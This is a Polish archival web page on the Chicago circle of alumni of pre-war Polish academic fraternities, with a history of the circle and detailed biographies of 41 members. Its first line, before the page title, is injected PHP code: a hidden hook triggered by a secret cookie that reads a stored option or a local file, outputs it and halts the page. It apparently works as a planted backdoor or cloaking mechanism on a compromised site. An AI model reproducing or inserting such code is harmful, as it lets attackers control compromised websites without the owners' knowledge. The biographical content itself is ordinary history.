if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Koło Filistrów w Chicago

Spotkanie Koła Filistrów Polskich Korporacji Akademickich, Chicago 1984 r.

Koło Filistrów Polskich Korporacji Akademickich w Chicago powstało ok. 1968 r. Wzorem było założone dekadę wcześniej podobne stowarzyszenie działające w Montrealu. Zrzeszało kilkudziesięciu członków przedwojennych polskich korporacji akademickich z Wilna, Warszawy, Lwowa, Gdańska, Poznania oraz Krakowa, należących do korporacji o różnym profilu ideowo-wychowawczym.

Spotkanie Koła Filistrów Polskich Korporacji Akademickich, Chicago 1990 r.

Celami Koła było pielęgnowanie kontaktów między korporantami oraz kultywowanie tradycji korporacji akademickich. W tych ramach organizowano komerse, spotkania dyskusyjne i bankiety.

Jednym z twórców i wieloletnim przewodniczącym Koła był Józef de Virion z warszawskiej K! Regia. Działalność Koła zamarła w latach 90-tych.

Lista członków

 1. Kazimierz Abramowicz, (1903 - 7 kwietnia 1970 w Londynie) s. Józefa, ochotnik WP 1920, student prawa USB, c. II sem. 1923/1924 Konwent Polonia, sędzia Okręgowy Śledczy w Wilnie (do spraw specjalnej wagi - politycznych, głównie komunistów), aresztowany przez NKWD, w dniu wybuchu wojny z Niemcami wywieziony do ZSRR, w Buzułuku szef Referatu Prawnego II Oddziału Sztabu, wyszedł z II Korpusem. Pracował w poselstwie RP w Teheranie, później w Libanie. Po wojnie w Stanach Zjednoczonych, działacz emigracyjny, m.in. delegat do Kongresu Polonii amerykańskiej, działacz Polonii na emigracji, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago [nr ew. 1373]

  Józef Białasiewicz, 1984 r.

 2. Józef Białasiewicz, (1912 - 27 września 1986) członek Korporacji Sparta (Warszawa), student UW, c. 1931, akt. 1931-36, prezes sem. let. 1933/34, dziennikarz, redaktor polityki zagr. w “Kurierze Porannym” (1939), żołnierz AK, redaktor prasy podziemnej, po wojnie na emigracji, w czasopismach polonijnych w Wielkiej Brytanii i w Stanach Zjednoczonych, m.in. redaktor “Dziennika Związkowego”, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

 3. Władysław Biłogan, członek Korporacji Cresovia Leopoliensis (Lwów), student UJK, założyciel Cresovii, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 4. Karol Borkowski, członek Korporacji Slensania (Poznań), po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 5. Joachim Bronny, (1914 - ), członek Korporacji Magna-Polonia (Poznań), c. 1934, sekretarz sem. zim. 1937/38, dr med. UP, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Walter Cebulski, 1990 r.

 6. Walter (Władysław) Cebulski (wcześniej Cebula), (22 października 1913 w Kupnie pow. Kolbuszowa - ), członek Korporacji Śniadecja (Wilno), s. Ludwika i Katarzyny z d. Mazan, absolwent Gimnazjum im. R. Traugutta w Brześciu n/Bugiem 1933 oraz Szkoły Podchorążych 82 Pułku Piechoty w Brześciu n/Bugiem 1934, student med. USB 1934-39, c. 1934, ppor. rez., w wojnie obronnej 1939 dowódca plutonu przeciwpancernego w 78 Pułku Piechoty, m.in. w walkach pod Kobryniem i Kockiem, w niewoli niemieckiej w oflagach Arnswalde II B i Gross Born II D 1939-45, po wojnie na emigracji w Belgii a od 1953 w Stanach Zjednoczonych, dr med. Uniwersytet w Brukseli 1947, dyrektor kliniki Societe des Secours aux Polonais w Brukseli, a takze pracownik Centrum Transfuzji Krawi oraz belgijskiego Czerwonego Krzyża 1949-53, lekarz Jackson Park Hospital oraz Saint Mary of Nazareth Hospital Center w Chicago 1953, a od 1954 prowadził prywatną praktykę lekarską w Chicago, emigracyjny działacz społeczny, prezes Związku Lekarzy Polskich 1974-89, przewodniczący komisji lekarskiej dla pomocy lekarskiej w Polsce, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, odznaczony Medalem “Gloria Medicinae”, Srebrnym Krzyżem Zasługi, Krzyżem za Wolność i Niepodległość, Medalem “Za udział w wojnie obronnej 1939″, awansowany na stopień kapitana

 7. Rudolf (Wyka-)Czarnowski, (ur. w Gdańsku - ), członek Korporacji Gasconia (Lwów), student i absolwent prawa UJK, prezes sem. zim. 1933/34 (?), prezes Towarzystwa Biblioteki Słuchaczy Prawa 1935 oraz 1936, po wojnie na emigracji w Stanach Zjednoczonych, adwokat w Chicago, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 8. Marian Kamil Dziewanowski, (maj 1913 w Żytomierzu - 18 lutego 2005 w Milwaukee) uczeń Gimnazjum Księży Pijarów w Rakowicach pod Krakowem, Liceum Krzemienieckiego, uczeń i absolwent Gimnazjum Księży Marianów na Bielanach pod Warszawą, student UJ, student i absolwent prawa UW 1933-37, przyjęty do Arkonii 1935 (nr ew. 1165), korespondent Polskiej Agencji Telegraficznej w Berlinie 1937-38, żołnierz kampanii wrześniowej 1939, w PSZ na Zachodzie, po wojnie na emigracji w Stanach Zjednoczonych, dr historii Harvard 1951, historyk emigracyjny, sowietolog, pisarz i dziennikarz, prof. Uniwersytetu w Bostonie i Uniwersytetu Stanu Wisconsin w Milwaukee, visting profesor Uniwersytetu w Tel Avivie i Florencji, członek Polskiej Akademii Umiejętności, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, autor wspomnień “Jedno życie to za mało” (wyd. Adam Marszałek, Toruń 1994)

  Jerzy Frąckowiak, 1984 r.

 9. Jerzy Frąckowiak, ( - 2 maja 1998 w Chicago), członek Korporacji Gedania Posnaniensis (Poznań), po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

 10. Zbigniew Jabłoński, ( - po 1966), członek Korporacji Lechia (Poznań), sędzia grodzki, po wojnie na emigracji w Stanach Zjednoczonych, adwokat, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 11. Jerzy Jeziorański, członek Korporacji Helania (Gdańsk), student i absolwent (inż.) Wydziału Architektury PG 1928-33, sekretarz sem. zim. 1932/33, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Ludwik Kamiński, 1990 r.

 12. Ludwik Kamiński, ( - po 1990), członek Korporacji Leonidania (Wilno), dr med., po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

 13. Michał Kamiński, ( - 19 czerwca 1989), członek Korporacji Sarmatia (?), członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 14. William Kleczka, członek Korporacji Chrobacja (Warszawa), po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Włodzimierz Kozłowski, 1984 r.

 15. Włodzimierz (Vladimir L.) Kozłowski, (1918 - ) członek Korporacji Vesalia, s. Włodzimierza i Marii, student med. UJ, c. 1937, akt. 1937-39, oficer kawalerii w wojnie obronnej 1939, uczestnik konspiracji, kapitan w Brytyjskich Siłach Zbrojnych 1945, po wojnie pozostał w Niemczech, a w 1948 wyemigrował do Stanów Zjednoczonych, ukończył Uniwersytet w Hamburgu, dr med., psychiatra, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, odznaczony m.in. Virtuti Militari oraz francuskim Croix de Guerre

 16. Kazimierz Krasicki, (4 stycznia 1906 w Kolędzianach k. Czortkowa - 16 grudnia 2000 w Nowym Jorku), członek Korporacji Regia, s. Jana Kazimierza, brat Jana (obaj Regia), absolwent Gimnazjum E. Konopczyńskiego im. Adama Mickiewicza w Warszawie, student i absolwent prawa 1932 UW, absolwent paryskiej Ecole des Sciences Politiques 1927, c. 1925 (?), akt. 1925-32, dyplomata, pracownik konsulatu w Brukseli 1933-36, konsul w Nowym Jorku 1939-45, po wojnie pozostał na emigracji w Stanach Zjednoczonych, pracował w firmie American Express 1946-71, działacz emigracyjny zaangażowany w pomoc polskim emigrantom, w 1939 przekazał nowemu konsulowi w Nowym Jorku pieczęć przedwojennego konsulatu, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 17. Julian Kuhajewski, członek Korporacji Gasconia (Lwów), po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Stanisław Latoszyński, 1984 r.

 18. Stanisław Latoszyński, (6 września 1911 - 21 września 1989) członek Korporacji Maratonia (Warszawa), po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, pochowany na Cmentarzu St. Adalberta w Chicago

 19. Józef (Henryk) Łukaszek, członek Korporacji Silesia (Poznań), dr med., rentgenolog, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 20. Marian Maniewski, (16 lutego 1906 w Świnkowie - 27 grudnia 1989 w Phoenix w Stanach Zjednoczonych) członek Korporacji Lechia (Poznań), absolwent Gimnazjum w Inowrocławiu 1925, student i absolwent prawa UP, sekretarz sem. zim. 1929/30, działacz społeczny Towarzystwa Pomocy Polakom Zagranicą, weteran wojenny, więzień wojenny, mjr rez., dr prawa Uniwersytetu w Cambridge, po wojnie na emigracji w Stanach Zjednoczonych, tłumacz i wydawca pisma “Polish Daily News” w Chicago, pracownik Muzeum Polskiego w Chicago, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Stefan Marcinkowski, 1984 r.

 21. Stefan Marcinkowski, (6 sierpnia 1906 w Robinie pow. Kościan - 18 maja 1996 w Chicago), członek Korporacji Posnania (Poznań), absolwent Gimnazjum im. Karola Marcinkowskiego w Poznaniu 1926, student i absolwent prawa UP 1926-30, c. 1926, działacz Związku Obrony Kresów Wschodnich, w 1939 naczelnik Urzędu Skarbowego w Kościanie, w wojnie obronnej 1939 w 55 Pułku Piechoty, m.in. uczestnik bitwy nad Bzurą, zbiegł z niewoli niemieckiej, w konspiracji ps. “Leszek Poraj” w Związku Jaszczurczym/NSZ, żołnierz Brygady Świętokrzyskiej, mjr, po wojnie na emigracji, początkowo w Niemczech, od 1950 w Stanach Zjednoczonych, działacz polonijny, współzałożyciel i prezes Polskiego Związku Ziem Zachodnich w Ameryce, red. naczelny „Quarterly of The Polish Western”, wiceprezes Instytutu im. Romana Dmowskiego, dyrektor Kongresu Polonii Amerykańskiej, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

 22. Izydor Modelski, członek Korporacji Helionia (Poznań), prof., po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Bogusław Musiałowicz, 1984 r.

 23. Bogusław Musiałowicz, (1910 - 10 marca 1988), członek Korporacji Tytania (Lwów), s. Józefa i Heleny z Sempolińskich, absolwent PL 1938, żołnierz wojny obronny obronnej 1939, por. art. II Korpusu PSZ na Zachodzie 1940-46, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, pochowany na Cmentarzu Maryhill w Niles, odznaczony Krzyżem Walecznych, Krzyżem Monte Cassino, brytyjskimi 1939-45 Star, Africa Star, Italy Star, Defence Medal

 24. Jan Kazimierz Narolewski, (1903 - po 1968), członek Korporacji Leonidania (Wilno), lekarz med. USB 1931, dr med., lekarz powiatowy, wojskowy inspektor Służby Zdrowia w Poznaniu 1939, żołnierz II Korpusu PSZ na Zachodzie, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, autor wspomnień “Dusza na skalpelu. Wspomnienia medyka” (wyd. Veritas, Londyn 1977)

  Tadeusz Niedzielski, 1984 r.

 25. Tadeusz Niedzielski, ( - 22 sierpnia 1994 w Chicago), członek Korporacji Lechicja (Warszawa), dr med., po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

 26. Jerzy (Ostoja-) Obiedziński, członek Korporacji Coronia (Warszawa), student SNP, c. 1931, akt. 1931-33, po wojnie na emigracji, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Witold Obuchowicz, 1984 r.

 27. Witold Obuchowicz, ( - 2 maj 1991), przyjęty do Arkonii 1933 (nr ew. 1145), po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Kazimierz Peczkis, 1964 r.

 28. Kazimierz Peczkis, (1909 w Równem na Wołyniu - 5 października 1989), członek Korporacji Ostoja, student SGGW 1927-33, c. 1927, akt. 1927-33, wiceprezes sem. zim. 1930/31, uczestnik wojny obronnej 1939 w oddziałach gen. Franciszka Kleeberga, w niewoli niemieckiej zwolniony, zaangażowany w konspiracji, aresztowany i więziony w obozie koncentracyjnym w Gross Rosen i Dachau, od ok. 1950 na emigracji w Stanach Zjednoczonych, pracował jako mierniczy, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, pochowany na cmentarzu Świętego Wojciecha w Niles w Illinois

 29. Józef J. Junosza-Podoski, (1900 na Kresach - 22 czerwca 1984 w Waszyngtonie), brat stryjeczny Jana (Arkonia), ochotnik 1 Pułku Ułanów Krechowieckich, student i absolwent (inż. elektryk) PW 1919-29, przyjęty do Arkonii 1921 (nr ew. 943), akt. 1921-29, po wojnie na emigracji w Stanach Zjednoczonych, wykładowca wyższych uczelni amerykańskich, przez 16 lat pracownik naukowy Biblioteki Kongresu w Waszyngtonie, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Jerzy Przyłuski, 1984 r.

 30. Jerzy Przyłuski, (30 października 1909 w Odessie - 9 sierpnia 2000 w Chicago), członek Korporacji Polesia (Wilno), absolwent Liceum Krzemienieckiego 1929, harcerz, student prawa USB, członek Korporacji Polesia (Wilno), c. 1930, prezes Polesii 193?, działacz akademicki, wiceprezes Bratniej Pomocy USB 1932/33 oraz prezes Bratniej Pomocy USB 1933/34, członek Zarządu Młodzieży Wszechpolskiej 1931/32 i 1932/33, mgr praw USB 1933, adwokat, żołnierz września 1939 w 13 Dywizji Piechoty, wzięty do niewoli pod Kockiem, jeniec wojenny obozu Gross-Born, po wojnie na emigracji w Stanach Zjednoczonych, działacz polonijny, dziennikarz, redaktor Dziennika Związkowego, wieloletni prezes SN w Chicago, współzałożyciel i prezes Instytutu Romana Dmowskiego, dyrektor Krajowego i kierownik Głównego Biura Kongresu Polonii Amerykańskiej, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, odznaczony medalem za udział w Kampanii Wrześniowej, Meritorious Service Award for many years of dedicated and loyal service (Zarząd Główny K.P.A., 1976), Distinguished Service Award (Zarząd Związku Narodowego Polskiego, 1992), Odznaką Zasługi dla Rzeczypospolitej Polskiej, (Prezydent RP, 1993), pochowany na Cmentarzu na Służewie w Warszawie

 31. Hugon Radzikowski, członek Korporacji Filomatia Vilnensis (Wilno), prawnik, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 32. Kazimierz Sadliński, (25 sierpnia 1913 w Zubowie pow. Trembowla - 22 marca 1985 w Chicago) członek Korporacji Aquitania (Lwów), s. Zygmunta i Anny z Szwandrowskich, brat Stanisława i Bolesława (obaj Aquitania), student i absolwent 1937/38 prawa UJK, po studiach pracownik kontrwywiadu, w 1940 deportowany na Syberię, od 1942 w 2 Korpusie PSZ, po wojnie na emigracji w Szkocji, skąd w 1951 wyjechał do Stanów Zjednoczonych, pracował jako piekarz, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 33. Stanisław Schroter, (8 maja 1917 w Katowicach - ), członek Korporacji Tytania (Lwów), pochodzi z Sosnowca, uczestnik wojny obronnej 1939, internowany na Węgrzech, później we Francji oraz Anglii, żołnierz II Korpusu PSZ na Zachodzie, absolwent polskiego uniwersytetu w Londynie, inż. chemik, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Stanisław Smoleński, 1984 r.

 34. Stanisław Smoleński, (13 kwietnia 1908 w Chicago - 12 maja 1996 w Chicago), członek Korporacji Masovia (Poznań), absolwent Gimnazjum w Wąbrzeźnie 1928, student med. UP 1928-31, student i absolwent 1938 farmacji UP, c. 1930, sekretarz sem. let. 1929/30 i sem. zim. 1930/31, wiceprezes wewn. sem. zim. 1931/32, prezes sem. let. 1934/35 i sem. zim. 1935/36, olderman sem. let. 1936/37, prezes PKM 1936/37, członek Komitetu Organizacyjnego Ślubowań Młodzieży Akademickiej 1936, dwukrotny prezes Koła Farmaceutów UP, członek Młodzieży Wszechpolskiej i Sodalicji Mariańskiej, członek SN, ppor. rez., w czasie okupacji zaangażowany w konspiracyjną działalność Narodowo-Ludowej Organizacji Walki, NSZ, AK, w randze kpt. walczył w Powstaniu Warszawskim, ranny w ataku na “Pastę”, jeniec w oflagach Gross Lubarts, AltenGrabov, Sandbostel i Lubece, po wojnie reaktywator i pierwszy prezes Związku Polaków w Niemczech, w 1949 wyemigrował do Stanów Zjednoczonych, prof. farmakognozji na Uniwersytecie Illinois w Chicago, autor kilkudziesięciu prac naukowych, aktywny działacz polonijny, długoletni prezes Instytutu im. Romana Dmowskiego, przewodniczący Fundacji Towarzystwa Przyjaciół Jana Pawła II, członek Zarządu Głównego Żołnierz AK na stan Illinois, Związku Ziem Zachodnich, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, odznaczony m.in. Krzyżem Kawalerskim Zasługi RP

  Marian Ludomir Smoniewski, 1990 r.

 35. Marian Ludomir Smoniewski, (1911 - 17 sierpnia 1994), członek Korporacji Masovia (Poznań), student i absolwent prawa UP, c. 1929, sekretarz sem. let. 1930/31, prezes sem. zim. 1932/33, do 1939 asesor Sądu Apelacyjnego w Poznaniu, ppor. rez., uczestnik wojny obronnej 1939, w niewoli niemieckiej w oflagach Eichstatt i Murnau, w 1947 wyemigrował do Stanów Zjednoczonych, aktywny działacz polonijny, członek SN, Instytutu Romana Dmowskiego, Związku Narodowego Polskiego, Towarzystwa Przyjaciół Fundacji im. Jana Pawła II, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, członek ostatniego Zarządu Koła, pochowany w grobie rodzinnym na Cmentarzu w Maryhill

 36. Mieczysław (Maria) Świrski, (29 sierpnia 1913 w Berezownicy Małej pow. Zbaraż - ), członek Korporacji Slavia (Lwów), herbu Szaława, absolwent Gimnazjum we Lwowie, student i absolwent 1938 med. UJK, c. 1934, akt. 1934-39, I wiceprezes sem. let. 1936/37, prezes sem. zim. 1937/38, olderman sem. let. 1937/38, pchor. rez. sanit., żołnierz w wojnie obronnej 1939, w konspiracji w delegaturze rządu we Lwowie, walczył w Powstaniu Warszawskim, wywieziony na roboty do Niemiec, po wojnie w ośrodkach polonijnych w brytyjskiej strefie w Niemczech, od 1950 na emigracji w Stanach Zjednoczonych, działacz Polonii, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 37. Marian Trecz, ( - 24 kwietnia 1984), członek Korporacji Palestra (Kraków), c.1933, akt. 1933-36, barwiarz 1934, olderman sem. let. 1934/35 oraz sem. zim. 1935/36, zwolniony 1936, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Józef de Virion, 1976 r.

 38. Józef de Virion, (7 listopada 1903 we Lwowie - 10 maja 2003), członek Korporacji Regia (Warszawa), wnuk Włodzimierza Władysława (Konwent Polonia), s. Włodzimierza (Arkonia) i Leokadii z Ratyńskich, kuzyn Jerzego (Regia), w wojnie polsko-rosyjskiej 1920 ochotnik w 214 Pułku Ułanów, absolwent Gimnazjum Kazimierza Kulwiecia w Warszawie 1922, student 1922-26 i absolwent 1926 prawa UW, dr nauk prawnych Uniwersytetu w Paryżu 1929, c. 1924, akt. 1924-30, ppor. rez. 1 Pułku Ułanów Krechowieckich, od 1930 ekspert prawny w Ministerstwie Wojny, w wojnie obronnej 1939 dowódca szwadronu w 103 Pułku Szwoleżerów na froncie wschodnim, internowany na Litwie, zatrzymany na statku przez marynarkę niemiecką w grudniu 1939 przebywał do 1945 w niemieckich obozach jenieckich w Arnswalde, Gross-Born, Sandbostel i Lubece, radca prawny Polskiej Misji Wojskowej w brytyjskiej strefie okupacyjnej w Niemczech 1945, później radca prawny Zjednoczenia Polskiego w Niemczech oraz radca prawny International Refugee Organization 1945-49, wyemigrował do Kanady, gdzie pracował w kancelarii adwokackiej w Val d’Or 1949-53, prowadził restaurację 1953-56 oraz pracował w YMCA, od 1958 w Stanach Zjednoczonych, pracował jako pomocnik kierownika w klubie społecznym, był członkiem ZNP, Stowarzyszenia Samopomocy Nowej Emigracji, Koła Kawalerii i Artylerii Konnej, Rady Narodowej w Londynie - oddział w Stanach Zjednoczonych, wieloletni delegat do Kongresu Polonii Amerykańskiej na stan Illinois, prezes Koła nr 15 Stowarzyszenia Polskich Kombatantów w Chicago, od 1986 przewodniczący Komitetu Pomocy Polakom na Wschodzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu, członek i ostatni przewodniczący Koła Filistrów Polskich Korporacji Akademickich w Chicago, autor tekstu “Polska Korporacja Akademicka Regia” (zob. szerzej Biuletyn Zarządu SFPKA, nr 10, Warszawa 1995, s. 79 i n.), odznaczony m.in. Krzyżem Kawalerskim OOP, Złotym Krzyżem Zasługi, Krzyżem za Udział w Wojnie 1918-1921, Medalem za Udział w Wojnie Obronnej 1939

  Wieńczysław Wagner, 1984 r.

 39. Wieńczysław J. Wagner, (12 grudnia 1917 - ) student prawa UW, przyjęty do Arkonii 1937 (nr ew. 1193), później studiował także na Uniwersytecie w Paryżu i North Western University w Chicago, po wojnie na emigracji w Stanach Zjednoczonych, dr praw (trzykrotnie), prof. prawa międzynarodowego, dr honoris causa Uniwersytetu Mikołaja Kopernika w Toruniu, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, zastępca członka Zarządu Stowarzyszenia Filistrów Korporacji Akademickich 1995-97, autor wspomnień “Od olimpiady do eskapady” (wyd. Adam Marszałek, Toruń 1997), wraz z Tadeuszem Macińskim współautor “Od konspiracji do emigracji” (Warszawa 1994)

 40. Michał Wojak, członek Korporacji Oxivia (?), po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 41. Marian J. Woźnicki, (1909 - listopad 1992), członek Korporacji Posnania (Poznań), syn Jana (Posnania), prezes sem. let. 1930/31, sem. zim. 1931/32 oraz 1932, wiceprezes Koła Prawników i Ekonomistów 1930/31, przewodniczący Delegat. Kół Naukowych UP 1932, po wojnie na emigracji w Stanach Zjednoczonych, dyrektor Radia “Głos Ameryki” w Waszyngtonie, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

Listę członków opracowano na podstawie:

1) spisów członków Koła Filistrów Polskich Korporacji Akademickich w Chicago, maszynopis, Archiwum Korporacyjne,
2) innych materiałów z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Koła.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 16 VII 2010 r.
Ostatnia zmiana: 12 II 2011 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Koło Filistrów Polskich Korporacji Akademickich w Chicago, (na:) www.archiwumkorporacyjne.pl, stan 12 II 2011 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }